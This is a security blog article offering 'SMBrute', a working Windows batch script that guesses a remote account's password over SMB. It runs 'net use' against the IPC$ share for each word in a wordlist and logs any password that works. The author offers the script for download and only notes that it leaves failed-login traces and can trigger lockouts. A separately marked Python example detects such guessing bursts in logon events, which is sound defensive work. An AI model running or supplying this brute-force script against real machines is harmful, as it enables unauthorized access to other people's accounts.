SMBrute

Some folks on a forum I frequent ( http://www.thebroken.org ) asked about brute forcing Windows passwords remotely. Brutus can do it, but I've had problems with its reliability against SMB shares. Here's a little batch script I wrote that uses the Windows 2000/XP "NET" command to find the password for a given account. I cribbed my password list from the folks that wrote Cain and Abel, but you can use any list you want. Download my script and Cain's password file from here. This is a very crude way to get the password to a remote Windows box, and if anyone audits the logs they will see a lot of failed login attempts. Be careful how you use this script, as many systems are set up so that they lock accounts after too many failed login attempts.

Usage: smbrute machinename local-account-to-crack

Code "SMBrute.bat" (comments are the REM lines):
@echo off
REM Don't show the commands we are running, just to make it pretty.
REM Print out how to use the script.
echo SMBrute Script, Written by Irongeek: http://www.irongeek.com
echo Usage: smbrute machinename local-account-to-crack
echo Output: log.txt(debugging log) and outfile.txt (Holds password and machine name)
REM Tell the user to put the word list in the same directory as the script.
echo Stuff: make sure that you have a text file with your word list called
echo "wordlist.txt" in the same working directory.
REM Make sure the user gives input.
if "%1"=="" goto end
if "%2"=="" goto end
REM Delete the old log file.
del log.txt
REM Loop until the end of the password list file. For each word:
REM   print the current password attempt to the screen,
REM   use the "NET USE" command to try and start a session,
REM   write valid passwords to the output file.
FOR /F "tokens=1" %%i in (wordlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>log.txt && ^
echo %time% %date% >> outfile.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> outfile.txt && goto end
:end
REM You're done.
echo *****Done*****
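The failed-login trail mentioned above is what a defender watches for. The following is an added example, not part of the original article: it flags a burst of failed logons from one source against one account, and any successful logon that follows the burst. The comma-separated record layout, host names, account names and thresholds are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Failed / successful logon event IDs: 4625 / 4624 on current Windows,
# 529 / 540 in the Windows 2000/XP Security log.
FAILED, SUCCESS = {"4625", "529"}, {"4624", "540"}

# Constructed sample records (assumed layout): time,event ID,account,source host
SAMPLE = """\
2024-01-01T10:00:01,4625,admin,WKSTN7
2024-01-01T10:00:02,4625,admin,WKSTN7
2024-01-01T10:00:03,4625,admin,WKSTN7
2024-01-01T10:00:03,4625,jsmith,WKSTN2
2024-01-01T10:00:04,4625,admin,WKSTN7
2024-01-01T10:00:05,4625,admin,WKSTN7
2024-01-01T10:00:06,4625,admin,WKSTN7
2024-01-01T10:00:07,4624,admin,WKSTN7
2024-01-01T10:00:09,4624,jsmith,WKSTN2
"""

def parse(text):
    """Yield (timestamp, event_id, account, source) from the assumed CSV layout."""
    for line in text.strip().splitlines():
        ts, event_id, account, source = line.split(",")
        yield datetime.fromisoformat(ts), event_id, account, source

def detect(events, threshold=5, window=timedelta(seconds=60)):
    """Alert on >= threshold failures per (source, account) inside window,
    and on a successful logon that follows such a burst."""
    recent = defaultdict(deque)  # (source, account) -> recent failure times
    flagged, alerts = set(), []
    for ts, event_id, account, source in sorted(events):
        key = (source, account)
        if event_id in FAILED:
            times = recent[key]
            times.append(ts)
            while ts - times[0] > window:  # drop failures older than the window
                times.popleft()
            if len(times) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("GUESSING", source, account, ts))
        elif event_id in SUCCESS and key in flagged:
            alerts.append(("SUCCESS_AFTER_GUESSING", source, account, ts))
            flagged.discard(key)
            recent.pop(key, None)
    return alerts

if __name__ == "__main__":
    for alert in detect(parse(SAMPLE)):
        print(*alert)
```

A single mistyped password followed by a success, as with the constructed jsmith records, stays below the threshold and raises nothing.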

 

 

Copyright 2020, IronGeek